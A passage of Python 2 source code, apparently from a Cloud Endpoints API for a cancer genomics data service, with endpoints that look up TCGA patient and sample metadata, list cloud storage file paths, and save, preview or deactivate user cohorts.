if db and db.open: db.close() request_finished.send(self) else: raise endpoints.UnauthorizedException("Authentication failed.") GET_RESOURCE = endpoints.ResourceContainer(patient_barcode=messages.StringField(1, required=True)) @endpoints.method(GET_RESOURCE, PatientDetails, path='patient_details', http_method='GET', name='cohorts.patient_details') def patient_details(self, request): """ Returns information about a specific participant, including a list of samples and aliquots derived from this patient. Takes a participant barcode (of length 12, *eg* TCGA-B9-7268) as a required parameter. User does not need to be authenticated. """ clinical_cursor = None sample_cursor = None aliquot_cursor = None db = None patient_barcode = request.get_assigned_value('patient_barcode') clinical_query_str = 'select * ' \ 'from metadata_clinical ' \ 'where ParticipantBarcode=%s' \ # % patient_barcode query_tuple = (str(patient_barcode),) sample_query_str = 'select SampleBarcode ' \ 'from metadata_biospecimen ' \ 'where ParticipantBarcode=%s' aliquot_query_str = 'select AliquotBarcode ' \ 'from metadata_data ' \ 'where ParticipantBarcode=%s ' \ 'group by AliquotBarcode' try: db = sql_connection() clinical_cursor = db.cursor(MySQLdb.cursors.DictCursor) clinical_cursor.execute(clinical_query_str, query_tuple) row = clinical_cursor.fetchone() item = MetadataItem( age_at_initial_pathologic_diagnosis=None if "age_at_initial_pathologic_diagnosis" not in row or row["age_at_initial_pathologic_diagnosis"] is None else int(row["age_at_initial_pathologic_diagnosis"]), anatomic_neoplasm_subdivision=str(row["anatomic_neoplasm_subdivision"]), batch_number=None if "batch_number" not in row or row["batch_number"] is None else int(row["batch_number"]), bcr=str(row["bcr"]), clinical_M=str(row["clinical_M"]), clinical_N=str(row["clinical_N"]), clinical_stage=str(row["clinical_stage"]), clinical_T=str(row["clinical_T"]), colorectal_cancer=str(row["colorectal_cancer"]), country=str(row["country"]), days_to_birth=None if "days_to_birth" not in row or row['days_to_birth'] is None else int(row["days_to_birth"]), days_to_death=None if "days_to_death" not in row or row['days_to_death'] is None else int(row["days_to_death"]), days_to_initial_pathologic_diagnosis=None if "days_to_initial_pathologic_diagnosis" not in row or row['days_to_initial_pathologic_diagnosis'] is None else int(row["days_to_initial_pathologic_diagnosis"]), days_to_last_followup=None if "days_to_last_followup" not in row or row['days_to_last_followup'] is None else int(row["days_to_last_followup"]), days_to_submitted_specimen_dx=None if "days_to_submitted_specimen_dx" not in row or row['days_to_submitted_specimen_dx'] is None else int(row["days_to_submitted_specimen_dx"]), Study=str(row["Study"]), ethnicity=str(row["ethnicity"]), frozen_specimen_anatomic_site=str(row["frozen_specimen_anatomic_site"]), gender=str(row["gender"]), height=None if "height" not in row or row['height'] is None else int(row["height"]), histological_type=str(row["histological_type"]), history_of_colon_polyps=str(row["history_of_colon_polyps"]), history_of_neoadjuvant_treatment=str(row["history_of_neoadjuvant_treatment"]), history_of_prior_malignancy=str(row["history_of_prior_malignancy"]), hpv_calls=str(row["hpv_calls"]), hpv_status=str(row["hpv_status"]), icd_10=str(row["icd_10"]), icd_o_3_histology=str(row["icd_o_3_histology"]), icd_o_3_site=str(row["icd_o_3_site"]), lymphatic_invasion=str(row["lymphatic_invasion"]), lymphnodes_examined=str(row["lymphnodes_examined"]), lymphovascular_invasion_present=str(row["lymphovascular_invasion_present"]), menopause_status=str(row["menopause_status"]), mononucleotide_and_dinucleotide_marker_panel_analysis_status=str(row["mononucleotide_and_dinucleotide_marker_panel_analysis_status"]), mononucleotide_marker_panel_analysis_status=str(row["mononucleotide_marker_panel_analysis_status"]), neoplasm_histologic_grade=str(row["neoplasm_histologic_grade"]), new_tumor_event_after_initial_treatment=str(row["new_tumor_event_after_initial_treatment"]), number_of_lymphnodes_examined=None if "number_of_lymphnodes_examined" not in row or row['number_of_lymphnodes_examined'] is None else int(row["number_of_lymphnodes_examined"]), number_of_lymphnodes_positive_by_he=None if "number_of_lymphnodes_positive_by_he" not in row or row['number_of_lymphnodes_positive_by_he'] is None else int(row["number_of_lymphnodes_positive_by_he"]), ParticipantBarcode=str(row["ParticipantBarcode"]), pathologic_M=str(row["pathologic_M"]), pathologic_N=str(row["pathologic_N"]), pathologic_stage=str(row["pathologic_stage"]), pathologic_T=str(row["pathologic_T"]), person_neoplasm_cancer_status=str(row["person_neoplasm_cancer_status"]), pregnancies=str(row["pregnancies"]), primary_neoplasm_melanoma_dx=str(row["primary_neoplasm_melanoma_dx"]), primary_therapy_outcome_success=str(row["primary_therapy_outcome_success"]), prior_dx=str(row["prior_dx"]), Project=str(row["Project"]), psa_value=None if "psa_value" not in row or row["psa_value"] is None else float(row["psa_value"]), race=str(row["race"]), residual_tumor=str(row["residual_tumor"]), tobacco_smoking_history=str(row["tobacco_smoking_history"]), tumor_tissue_site=str(row["tumor_tissue_site"]), tumor_type=str(row["tumor_type"]), weiss_venous_invasion=str(row["weiss_venous_invasion"]), vital_status=str(row["vital_status"]), weight=None if "weight" not in row or row["weight"] is None else int(float(row["weight"])), year_of_initial_pathologic_diagnosis=str(row["year_of_initial_pathologic_diagnosis"]) ) sample_cursor = db.cursor(MySQLdb.cursors.DictCursor) sample_cursor.execute(sample_query_str, query_tuple) sample_data = [] for row in sample_cursor.fetchall(): sample_data.append(row['SampleBarcode']) aliquot_cursor = db.cursor(MySQLdb.cursors.DictCursor) aliquot_cursor.execute(aliquot_query_str, query_tuple) aliquot_data = [] for row in aliquot_cursor.fetchall(): aliquot_data.append(row['AliquotBarcode']) return PatientDetails(clinical_data=item, samples=sample_data, aliquots=aliquot_data) except (IndexError, TypeError), e: logger.info("Patient {} not found. Error: {}".format(patient_barcode, e)) raise endpoints.NotFoundException("Patient {} not found.".format(patient_barcode)) except MySQLdb.ProgrammingError as e: msg = '{}:\n\tpatient query: {} {}\n\tsample query: {} {}\n\taliquot query: {} {}'\ .format(e, clinical_query_str, query_tuple, sample_query_str, query_tuple, aliquot_query_str, query_tuple) logger.warn(msg) raise endpoints.BadRequestException("Error retrieving patient, sample, or aliquot data. {}".format(msg)) finally: if clinical_cursor: clinical_cursor.close() if sample_cursor: sample_cursor.close() if aliquot_cursor: aliquot_cursor.close() if db and db.open: db.close() GET_RESOURCE = endpoints.ResourceContainer(sample_barcode=messages.StringField(1, required=True), platform=messages.StringField(2), pipeline=messages.StringField(3)) @endpoints.method(GET_RESOURCE, SampleDetails, path='sample_details', http_method='GET', name='cohorts.sample_details') def sample_details(self, request): """ Given a sample barcode (of length 16, *eg* TCGA-B9-7268-01A), this endpoint returns all available "biospecimen" information about this sample, the associated patient barcode, a list of associated aliquots, and a list of "data_details" blocks describing each of the data files associated with this sample """ biospecimen_cursor = None aliquot_cursor = None patient_cursor = None data_cursor = None db = None sample_barcode = request.get_assigned_value('sample_barcode') biospecimen_query_str = 'select * ' \ 'from metadata_biospecimen ' \ 'where SampleBarcode=%s' query_tuple = (str(sample_barcode),) extra_query_tuple = query_tuple aliquot_query_str = 'select AliquotBarcode ' \ 'from metadata_data ' \ 'where SampleBarcode=%s ' patient_query_str = 'select ParticipantBarcode ' \ 'from metadata_biospecimen ' \ 'where SampleBarcode=%s ' data_query_str = 'select ' \ 'SampleBarcode, ' \ 'DataCenterName, ' \ 'DataCenterType, ' \ 'DataFileName, ' \ 'DataFileNameKey, ' \ 'DatafileUploaded, ' \ 'DataLevel,' \ 'Datatype,' \ 'GenomeReference,' \ 'GG_dataset_id, ' \ 'GG_readgroupset_id, ' \ 'Pipeline,' \ 'Platform,' \ 'platform_full_name,' \ 'Project,' \ 'Repository,' \ 'SDRFFileName,' \ 'SecurityProtocol ' \ 'from metadata_data ' \ 'where SampleBarcode=%s ' if request.get_assigned_value('platform') is not None: platform = request.get_assigned_value('platform') aliquot_query_str += ' and platform=%s ' data_query_str += ' and platform=%s ' extra_query_tuple += (str(platform),) if request.get_assigned_value('pipeline') is not None: pipeline = request.get_assigned_value('pipeline') aliquot_query_str += ' and pipeline=%s ' data_query_str += ' and pipeline=%s ' extra_query_tuple += (str(pipeline),) aliquot_query_str += ' group by AliquotBarcode' patient_query_str += ' group by ParticipantBarcode' try: db = sql_connection() biospecimen_cursor = db.cursor(MySQLdb.cursors.DictCursor) biospecimen_cursor.execute(biospecimen_query_str, query_tuple) row = biospecimen_cursor.fetchone() item = MetadataItem( avg_percent_lymphocyte_infiltration=None if "avg_percent_lymphocyte_infiltration" not in row or row["avg_percent_lymphocyte_infiltration"] is None else float(row["avg_percent_lymphocyte_infiltration"]), avg_percent_monocyte_infiltration=None if "avg_percent_monocyte_infiltration" not in row or row["avg_percent_monocyte_infiltration"] is None else float(row["avg_percent_monocyte_infiltration"]), avg_percent_necrosis=None if "avg_percent_necrosis" not in row or row["avg_percent_necrosis"] is None else float(row["avg_percent_necrosis"]), avg_percent_neutrophil_infiltration=None if "avg_percent_neutrophil_infiltration" not in row or row["avg_percent_neutrophil_infiltration"] is None else float(row["avg_percent_neutrophil_infiltration"]), avg_percent_normal_cells=None if "avg_percent_normal_cells" not in row or row["avg_percent_normal_cells"] is None else float(row["avg_percent_normal_cells"]), avg_percent_stromal_cells=None if "avg_percent_stromal_cells" not in row or row["avg_percent_stromal_cells"] is None else float(row["avg_percent_stromal_cells"]), avg_percent_tumor_cells=None if "avg_percent_tumor_cells" not in row or row["avg_percent_tumor_cells"] is None else float(row["avg_percent_tumor_cells"]), avg_percent_tumor_nuclei=None if "avg_percent_tumor_nuclei" not in row or row["avg_percent_tumor_nuclei"] is None else float(row["avg_percent_tumor_nuclei"]), batch_number=None if "batch_number" not in row or row["batch_number"] is None else int(row["batch_number"]), bcr=str(row["bcr"]), days_to_collection=None if "days_to_collection" not in row or row['days_to_collection'] is None else int(row["days_to_collection"]), max_percent_lymphocyte_infiltration=None if "max_percent_lymphocyte_infiltration" not in row or row["max_percent_lymphocyte_infiltration"] is None else int(row["max_percent_lymphocyte_infiltration"]), # 46) max_percent_monocyte_infiltration=None if "max_percent_monocyte_infiltration" not in row or row["max_percent_monocyte_infiltration"] is None else int(row["max_percent_monocyte_infiltration"]), # 47) max_percent_necrosis=None if "max_percent_necrosis" not in row or row["max_percent_necrosis"] is None else int(row["max_percent_necrosis"]), # 48) max_percent_neutrophil_infiltration=None if "max_percent_neutrophil_infiltration" not in row or row["max_percent_neutrophil_infiltration"] is None else int(row["max_percent_neutrophil_infiltration"]), # 49) max_percent_normal_cells=None if "max_percent_normal_cells" not in row or row["max_percent_normal_cells"] is None else int(row["max_percent_normal_cells"]), # 50) max_percent_stromal_cells=None if "max_percent_stromal_cells" not in row or row["max_percent_stromal_cells"] is None else int(row["max_percent_stromal_cells"]), # 51) max_percent_tumor_cells=None if "max_percent_tumor_cells" not in row or row["max_percent_tumor_cells"] is None else int(row["max_percent_tumor_cells"]), # 52) max_percent_tumor_nuclei=None if "max_percent_tumor_nuclei" not in row or row["max_percent_tumor_nuclei"] is None else int(row["max_percent_tumor_nuclei"]), # 53) min_percent_lymphocyte_infiltration=None if "min_percent_lymphocyte_infiltration" not in row or row["min_percent_lymphocyte_infiltration"] is None else int(row["min_percent_lymphocyte_infiltration"]), # 55) min_percent_monocyte_infiltration=None if "min_percent_monocyte_infiltration" not in row or row["min_percent_monocyte_infiltration"] is None else int(row["min_percent_monocyte_infiltration"]), # 56) min_percent_necrosis=None if "min_percent_necrosis" not in row or row["min_percent_necrosis"] is None else int(row["min_percent_necrosis"]), # 57) min_percent_neutrophil_infiltration=None if "min_percent_neutrophil_infiltration" not in row or row["min_percent_neutrophil_infiltration"] is None else int(row["min_percent_neutrophil_infiltration"]), # 58) min_percent_normal_cells=None if "min_percent_normal_cells" not in row or row["min_percent_normal_cells"] is None else int(row["min_percent_normal_cells"]), # 59) min_percent_stromal_cells=None if "min_percent_stromal_cells" not in row or row["min_percent_stromal_cells"] is None else int(row["min_percent_stromal_cells"]), # 60) min_percent_tumor_cells=None if "min_percent_tumor_cells" not in row or row["min_percent_tumor_cells"] is None else int(row["min_percent_tumor_cells"]), # 61) min_percent_tumor_nuclei=None if "min_percent_tumor_nuclei" not in row or row["min_percent_tumor_nuclei"] is None else int(row["min_percent_tumor_nuclei"]), # 62) ParticipantBarcode=str(row["ParticipantBarcode"]), Project=str(row["Project"]), SampleBarcode=str(row["SampleBarcode"]), Study=str(row["Study"]) ) aliquot_cursor = db.cursor(MySQLdb.cursors.DictCursor) aliquot_cursor.execute(aliquot_query_str, extra_query_tuple) aliquot_data = [] for row in aliquot_cursor.fetchall(): aliquot_data.append(row['AliquotBarcode']) patient_cursor = db.cursor(MySQLdb.cursors.DictCursor) patient_cursor.execute(patient_query_str, query_tuple) row = patient_cursor.fetchone() if row is None: aliquot_cursor.close() patient_cursor.close() biospecimen_cursor.close() db.close() error_message = "Sample barcode {} not found in metadata_biospecimen table.".format(sample_barcode) return SampleDetails(biospecimen_data=None, aliquots=[], patient=None, data_details=[], data_details_count=None, error=error_message) patient_barcode = str(row["ParticipantBarcode"]) data_cursor = db.cursor(MySQLdb.cursors.DictCursor) data_cursor.execute(data_query_str, extra_query_tuple) data_data = [] bad_repo_count = 0 bad_repo_set = set() for row in data_cursor.fetchall(): if not row.get('DataFileNameKey'): continue if 'controlled' not in str(row['SecurityProtocol']).lower(): cloud_storage_path = "gs://{}{}".format(settings.OPEN_DATA_BUCKET, row.get('DataFileNameKey')) else: # not filtering on dbGaP_authorized: if row['Repository'].lower() == 'dcc': bucket_name = settings.DCC_CONTROLLED_DATA_BUCKET elif row['Repository'].lower() == 'cghub': bucket_name = settings.CGHUB_CONTROLLED_DATA_BUCKET else: # shouldn't ever happen bad_repo_count += 1 bad_repo_set.add(row['Repository']) continue cloud_storage_path = "gs://{}{}".format(bucket_name, row.get('DataFileNameKey')) data_item = DataDetails( SampleBarcode=str(row['SampleBarcode']), DataCenterName=str(row['DataCenterName']), DataCenterType=str(row['DataCenterType']), DataFileName=str(row['DataFileName']), DataFileNameKey=str(row.get('DataFileNameKey')), DatafileUploaded=str(row['DatafileUploaded']), DataLevel=str(row['DataLevel']), Datatype=str(row['Datatype']), GenomeReference=str(row['GenomeReference']), GG_dataset_id=str(row['GG_dataset_id']), GG_readgroupset_id=str(row['GG_readgroupset_id']), Pipeline=str(row['Pipeline']), Platform=str(row['Platform']), platform_full_name=str(row['platform_full_name']), Project=str(row['Project']), Repository=str(row['Repository']), SDRFFileName=str(row['SDRFFileName']), SecurityProtocol=str(row['SecurityProtocol']), CloudStoragePath=cloud_storage_path ) data_data.append(data_item) if bad_repo_count > 0: logger.warn("not returning {count} row(s) in sample_details due to repositories: {bad_repo_list}" .format(count=bad_repo_count, bad_repo_list=list(bad_repo_set))) return SampleDetails(biospecimen_data=item, aliquots=aliquot_data, patient=patient_barcode, data_details=data_data, data_details_count=len(data_data)) except (IndexError, TypeError) as e: logger.info("Sample details for barcode {} not found. Error: {}".format(sample_barcode, e)) raise endpoints.NotFoundException( "Sample details for barcode {} not found.".format(sample_barcode)) except MySQLdb.ProgrammingError as e: msg = '{}:\n\tbiospecimen query: {} {}\n\tpatient query: {} {}\n\tdata query: {} {}'\ .format(e, biospecimen_query_str, query_tuple, patient_query_str, query_tuple, data_query_str, extra_query_tuple) logger.warn(msg) raise endpoints.BadRequestException("Error retrieving biospecimen, patient, or other data. {}".format(msg)) finally: if biospecimen_cursor: biospecimen_cursor.close() if aliquot_cursor: aliquot_cursor.close() if patient_cursor: patient_cursor.close() if data_cursor: data_cursor.close() if db and db.open: db.close() GET_RESOURCE = endpoints.ResourceContainer(cohort_id=messages.IntegerField(1, required=True), limit=messages.IntegerField(2), platform=messages.StringField(3), pipeline=messages.StringField(4), token=messages.StringField(5)) @endpoints.method(GET_RESOURCE, DataFileNameKeyList, path='datafilenamekey_list_from_cohort', http_method='GET', name='cohorts.datafilenamekey_list_from_cohort') def datafilenamekey_list_from_cohort(self, request): """ Takes a cohort id as a required parameter and returns cloud storage paths to files associated with all the samples in that cohort, up to a default limit of 10,000 files. Authentication is required. User must have READER or OWNER permissions on the cohort. """ user_email = None cursor = None db = None limit = request.get_assigned_value('limit') platform = request.get_assigned_value('platform') pipeline = request.get_assigned_value('pipeline') cohort_id = request.get_assigned_value('cohort_id') if are_there_bad_keys(request): err_msg = construct_parameter_error_message(request, False) raise endpoints.BadRequestException(err_msg) if endpoints.get_current_user() is not None: user_email = endpoints.get_current_user().email() # users have the option of pasting the access token in the query string # or in the 'token' field in the api explorer # but this is not required access_token = request.get_assigned_value('token') if access_token: user_email = get_user_email_from_token(access_token) if user_email: django.setup() query_str = 'SELECT DataFileNameKey, SecurityProtocol, Repository ' \ 'FROM metadata_data ' try: user_id = Django_User.objects.get(email=user_email).id django_cohort = Django_Cohort.objects.get(id=cohort_id) cohort_perm = Cohort_Perms.objects.get(cohort_id=cohort_id, user_id=user_id) except (ObjectDoesNotExist, MultipleObjectsReturned), e: logger.warn(e) err_msg = "Error retrieving cohort {} for user {}: {}".format(cohort_id, user_email, e) if 'Cohort_Perms' in e.message: err_msg = "User {} does not have permissions on cohort {}. Error: {}"\ .format(user_email, cohort_id, e) request_finished.send(self) raise endpoints.UnauthorizedException(err_msg) query_str += 'JOIN cohorts_samples ON metadata_data.SampleBarcode=cohorts_samples.sample_id ' \ 'WHERE cohorts_samples.cohort_id=%s ' \ 'AND DataFileNameKey != "" AND DataFileNameKey is not null ' query_tuple = (cohort_id,) if platform: query_str += ' and metadata_data.Platform=%s ' query_tuple += (platform,) if pipeline: query_str += ' and metadata_data.Pipeline=%s ' query_tuple += (pipeline,) query_str += ' GROUP BY DataFileNameKey, SecurityProtocol, Repository ' if limit is None: query_str += ' LIMIT 10000' else: query_str += ' LIMIT %s' query_tuple += (limit,) try: db = sql_connection() cursor = db.cursor(MySQLdb.cursors.DictCursor) cursor.execute(query_str, query_tuple) datafilenamekeys = [] bad_repo_count = 0 bad_repo_set = set() for row in cursor.fetchall(): if not row.get('DataFileNameKey'): continue if 'controlled' not in str(row['SecurityProtocol']).lower(): datafilenamekeys.append("gs://{}{}".format(settings.OPEN_DATA_BUCKET, row.get('DataFileNameKey'))) else: # not filtering on dbGaP_authorized bucket_name = '' if row['Repository'].lower() == 'dcc': bucket_name = settings.DCC_CONTROLLED_DATA_BUCKET elif row['Repository'].lower() == 'cghub': bucket_name = settings.CGHUB_CONTROLLED_DATA_BUCKET else: # shouldn't ever happen bad_repo_count += 1 bad_repo_set.add(row['Repository']) continue datafilenamekeys.append("gs://{}{}".format(bucket_name, row.get('DataFileNameKey'))) if bad_repo_count > 0: logger.warn("not returning {count} row(s) in sample_details due to repositories: {bad_repo_list}" .format(count=bad_repo_count, bad_repo_list=list(bad_repo_set))) return DataFileNameKeyList(datafilenamekeys=datafilenamekeys, count=len(datafilenamekeys)) except (IndexError, TypeError), e: logger.warn(e) raise endpoints.NotFoundException("File paths for cohort {} not found.".format(cohort_id)) except MySQLdb.ProgrammingError as e: msg = '{}:\n\t query: {} {}'.format(e, query_str, query_tuple) logger.warn(msg) raise endpoints.BadRequestException("Error retrieving file paths. {}".format(msg)) finally: if cursor: cursor.close() if db and db.open: db.close() request_finished.send(self) else: raise endpoints.UnauthorizedException("Authentication failed.") GET_RESOURCE = endpoints.ResourceContainer(sample_barcode=messages.StringField(1, required=True), platform=messages.StringField(2), pipeline=messages.StringField(3)) @endpoints.method(GET_RESOURCE, DataFileNameKeyList, path='datafilenamekey_list_from_sample', http_method='GET', name='cohorts.datafilenamekey_list_from_sample') def datafilenamekey_list_from_sample(self, request): """ Takes a sample barcode as a required parameter and returns cloud storage paths to files associated with that sample. """ cursor = None db = None sample_barcode = request.get_assigned_value('sample_barcode') platform = request.get_assigned_value('platform') pipeline = request.get_assigned_value('pipeline') if are_there_bad_keys(request): err_msg = construct_parameter_error_message(request, False) raise endpoints.BadRequestException(err_msg) query_str = 'SELECT DataFileNameKey, SecurityProtocol, Repository ' \ 'FROM metadata_data WHERE SampleBarcode=%s ' query_tuple = (sample_barcode,) if platform: query_str += ' and Platform=%s ' query_tuple += (platform,) if pipeline: query_str += ' and Pipeline=%s ' query_tuple += (pipeline,) query_str += ' GROUP BY DataFileNameKey, SecurityProtocol, Repository' try: db = sql_connection() cursor = db.cursor(MySQLdb.cursors.DictCursor) cursor.execute(query_str, query_tuple) datafilenamekeys = [] bad_repo_count = 0 bad_repo_set = set() for row in cursor.fetchall(): if not row.get('DataFileNameKey'): continue if 'controlled' not in str(row['SecurityProtocol']).lower(): datafilenamekeys.append("gs://{}{}".format(settings.OPEN_DATA_BUCKET, row.get('DataFileNameKey'))) else: # not filtering on dbGaP_authorized bucket_name = '' if row['Repository'].lower() == 'dcc': bucket_name = settings.DCC_CONTROLLED_DATA_BUCKET elif row['Repository'].lower() == 'cghub': bucket_name = settings.CGHUB_CONTROLLED_DATA_BUCKET else: # shouldn't ever happen bad_repo_count += 0 bad_repo_set.add(row['Repository']) continue datafilenamekeys.append("gs://{}{}".format(bucket_name, row.get('DataFileNameKey'))) if bad_repo_count > 0: logger.warn("not returning {count} row(s) in sample_details due to repositories: {bad_repo_list}" .format(count=bad_repo_count, bad_repo_list=list(bad_repo_set))) return DataFileNameKeyList(datafilenamekeys=datafilenamekeys, count=len(datafilenamekeys)) except (IndexError, TypeError), e: logger.warn(e) raise endpoints.NotFoundException("File paths for sample {} not found.".format(sample_barcode)) except MySQLdb.ProgrammingError as e: msg = '{}:\n\t query: {} {}'.format(e, query_str, query_tuple) logger.warn(msg) raise endpoints.BadRequestException("Error retrieving file paths. {}".format(msg)) finally: if cursor: cursor.close() if db and db.open: db.close() POST_RESOURCE = endpoints.ResourceContainer(IncomingMetadataItem, name=messages.StringField(2, required=True), token=messages.StringField(3) ) @endpoints.method(POST_RESOURCE, Cohort, path='save_cohort', http_method='POST', name='cohorts.save') def save_cohort(self, request): """ Creates and saves a cohort. Takes a JSON object in the request body to use as the cohort's filters. Authentication is required. Returns information about the saved cohort, including the number of patients and the number of samples in that cohort. """ user_email = None patient_cursor = None sample_cursor = None db = None if endpoints.get_current_user() is not None: user_email = endpoints.get_current_user().email() # users have the option of pasting the access token in the query string # or in the 'token' field in the api explorer # but this is not required access_token = request.get_assigned_value('token') if access_token: user_email = get_user_email_from_token(access_token) if user_email: django.setup() try: django_user = Django_User.objects.get(email=user_email) user_id = django_user.id except (ObjectDoesNotExist, MultipleObjectsReturned), e: logger.warn(e) request_finished.send(self) raise endpoints.NotFoundException("%s does not have an entry in the user database." % user_email) query_dict = { k.name: request.get_assigned_value(k.name) for k in request.all_fields() if request.get_assigned_value(k.name) and k.name is not 'name' and k.name is not 'token' } if are_there_bad_keys(request) or are_there_no_acceptable_keys(request): err_msg = construct_parameter_error_message(request, True) request_finished.send(self) raise endpoints.BadRequestException(err_msg) patient_query_str = 'SELECT DISTINCT(IF(ParticipantBarcode="", LEFT(SampleBarcode,12), ParticipantBarcode)) ' \ 'AS ParticipantBarcode ' \ 'FROM metadata_samples ' sample_query_str = 'SELECT SampleBarcode ' \ 'FROM metadata_samples ' value_tuple = () if len(query_dict) > 0: where_clause = build_where_clause(query_dict) patient_query_str += ' WHERE ' + where_clause['query_str'] sample_query_str += ' WHERE ' + where_clause['query_str'] value_tuple = where_clause['value_tuple'] sample_query_str += ' GROUP BY SampleBarcode' patient_barcodes = [] sample_barcodes = [] try: db = sql_connection() patient_cursor = db.cursor(MySQLdb.cursors.DictCursor) patient_cursor.execute(patient_query_str, value_tuple) for row in patient_cursor.fetchall(): patient_barcodes.append(row['ParticipantBarcode']) sample_cursor = db.cursor(MySQLdb.cursors.DictCursor) sample_cursor.execute(sample_query_str, value_tuple) for row in sample_cursor.fetchall(): sample_barcodes.append(row['SampleBarcode']) except (IndexError, TypeError), e: logger.warn(e) raise endpoints.NotFoundException("Error retrieving samples or patients") except MySQLdb.ProgrammingError as e: msg = '{}:\n\tpatient query: {} {}\n\tsample query: {} {}'\ .format(e, patient_query_str, value_tuple, sample_query_str, value_tuple) logger.warn(msg) raise endpoints.BadRequestException("Error saving cohort. {}".format(msg)) finally: if patient_cursor: patient_cursor.close() if sample_cursor: sample_cursor.close() if db and db.open: db.close() request_finished.send(self) cohort_name = request.get_assigned_value('name') # 1. create new cohorts_cohort with name, active=True, last_date_saved=now created_cohort = Django_Cohort.objects.create(name=cohort_name, active=True, last_date_saved=datetime.utcnow()) created_cohort.save() # 2. insert patients into cohort_patients patient_barcodes = list(set(patient_barcodes)) patient_list = [Patients(cohort=created_cohort, patient_id=patient_code) for patient_code in patient_barcodes] Patients.objects.bulk_create(patient_list) # 3. insert samples into cohort_samples sample_barcodes = list(set(sample_barcodes)) sample_list = [Samples(cohort=created_cohort, sample_id=sample_code) for sample_code in sample_barcodes] Samples.objects.bulk_create(sample_list) # 4. Set permission for user to be owner perm = Cohort_Perms(cohort=created_cohort, user=django_user, perm=Cohort_Perms.OWNER) perm.save() # 5. Create filters applied for key, val in query_dict.items(): Filters.objects.create(resulting_cohort=created_cohort, name=key, value=val).save() # 6. Store cohort to BigQuery project_id = settings.BQ_PROJECT_ID cohort_settings = settings.GET_BQ_COHORT_SETTINGS() bcs = BigQueryCohortSupport(project_id, cohort_settings.dataset_id, cohort_settings.table_id) bcs.add_cohort_with_sample_barcodes(created_cohort.id, sample_barcodes) request_finished.send(self) return Cohort(id=str(created_cohort.id), name=cohort_name, last_date_saved=str(datetime.utcnow()), num_patients=str(len(patient_barcodes)), num_samples=str(len(sample_barcodes)) ) else: raise endpoints.UnauthorizedException("Authentication failed.") DELETE_RESOURCE = endpoints.ResourceContainer(cohort_id=messages.IntegerField(1, required=True), token=messages.StringField(2) ) @endpoints.method(DELETE_RESOURCE, ReturnJSON, path='delete_cohort', http_method='POST', name='cohorts.delete') def delete_cohort(self, request): """ Deletes a cohort. User must have owner permissions on the cohort. """ user_email = None return_message = None if endpoints.get_current_user() is not None: user_email = endpoints.get_current_user().email() # users have the option of pasting the access token in the query string # or in the 'token' field in the api explorer # but this is not required access_token = request.get_assigned_value('token') if access_token: user_email = get_user_email_from_token(access_token) cohort_id = request.get_assigned_value('cohort_id') if user_email: django.setup() try: django_user = Django_User.objects.get(email=user_email) user_id = django_user.id except (ObjectDoesNotExist, MultipleObjectsReturned), e: logger.warn(e) request_finished.send(self) raise endpoints.NotFoundException("%s does not have an entry in the user database." % user_email) try: cohort_to_deactivate = Django_Cohort.objects.get(id=cohort_id) if cohort_to_deactivate.active is True: cohort_perm = Cohort_Perms.objects.get(cohort_id=cohort_id, user_id=user_id) if cohort_perm.perm == 'OWNER': cohort_to_deactivate.active = False cohort_to_deactivate.save() return_message = 'Cohort %d successfully deactivated.' % cohort_id else: return_message = 'You do not have owner permission on cohort %d.' % cohort_id else: return_message = "Cohort %d was already deactivated." % cohort_id except (ObjectDoesNotExist, MultipleObjectsReturned), e: logger.warn(e) raise endpoints.NotFoundException( "Either cohort %d does not have an entry in the database " "or you do not have owner or reader permissions on this cohort." % cohort_id) finally: request_finished.send(self) else: raise endpoints.UnauthorizedException("Unsuccessful authentication.") return ReturnJSON(msg=return_message) POST_RESOURCE = endpoints.ResourceContainer(IncomingMetadataItem) @endpoints.method(POST_RESOURCE, CohortPatientsSamplesList, path='preview_cohort', http_method='POST', name='cohorts.preview') def preview_cohort(self, request): """ Takes a JSON object of filters in the request body and returns a "preview" of the cohort that would result from passing a similar request to the cohort **save** endpoint. This preview consists of two lists: the lists of participant (aka patient) barcodes, and the list of sample barcodes. Authentication is not required. """ # print >> sys.stderr,'Called '+sys._getframe().f_code.co_name patient_cursor = None sample_cursor = None db = None query_dict = { k.name: request.get_assigned_value(k.name) for k in request.all_fields() if request.get_assigned_value(k.name) } if are_there_bad_keys(request) or are_there_no_acceptable_keys(request): err_msg = construct_parameter_error_message(request, True) raise endpoints.BadRequestException(err_msg) patient_query_str = 'SELECT DISTINCT(IF(ParticipantBarcode="", LEFT(SampleBarcode,12), ParticipantBarcode)) ' \ 'AS ParticipantBarcode ' \ 'FROM metadata_samples ' sample_query_str = 'SELECT SampleBarcode ' \ 'FROM metadata_samples ' value_tuple = () if len(query_dict) > 0: where_clause = build_where_clause(query_dict) patient_query_str += ' WHERE ' + where_clause['query_str'] sample_query_str += ' WHERE ' + where_clause['query_str'] value_tuple = where_clause['value_tuple'] sample_query_str += ' GROUP BY SampleBarcode' patient_barcodes = [] sample_barcodes = [] try: db = sql_connection() patient_cursor = db.cursor(MySQLdb.cursors.DictCursor) patient_cursor.execute(patient_query_str, value_tuple) for row in patient_cursor.fetchall(): patient_barcodes.append(row['ParticipantBarcode']) sample_cursor = db.cursor(MySQLdb.cursors.DictCursor) sample_cursor.execute(sample_query_str, value_tuple) for row in sample_cursor.fetchall(): sample_barcodes.append(row['SampleBarcode']) except (IndexError, TypeError), e: logger.warn(e) raise endpoints.NotFoundException("Error retrieving samples or patients: {}".format(e)) except MySQLdb.ProgrammingError as e: msg = '{}:\n\tpatient query: {} {}\n\tsample query: {} {}'\ .format(e, patient_query_str, value_tuple, sample_query_str, value_tuple) logger.warn(msg) raise endpoints.BadRequestException("Error previewing cohort. {}".format(msg)) finally: if patient_cursor: patient_cursor.close() if sample_cursor: sample_cursor.close() if db and db.open: db.close() return CohortPatientsSamplesList(patients=patient_barcodes, patient_count=len(patient_barcodes), samples=sample_barcodes, sample_count=len(sample_barcodes)) GET_RESOURCE = endpoints.ResourceContainer(cohort_id=messages.IntegerField(1, required=True), token=messages.StringField(2)) @endpoints.method(GET_RESOURCE, GoogleGenomicsList, path='google_genomics_from_cohort', http_method='GET', name='cohorts.google_genomics_from_cohort') def google_genomics_from_cohort(self, request): """ Returns a list of Google Genomics dataset and readgroupset ids associated with all the samples in a specified cohort. Authentication is required. User must have either READER or OWNER permissions on the cohort. """ cursor = None db = None user_email = None cohort_id = request.get_assigned_value('cohort_id') if are_there_bad_keys(request): err_msg = construct_parameter_error_message(request, False) raise endpoints.BadRequestException(err_msg) if endpoints.get_current_user() is not None: user_email = endpoints.get_current_user().email() # users have the option of pasting the access token in the query string # or in 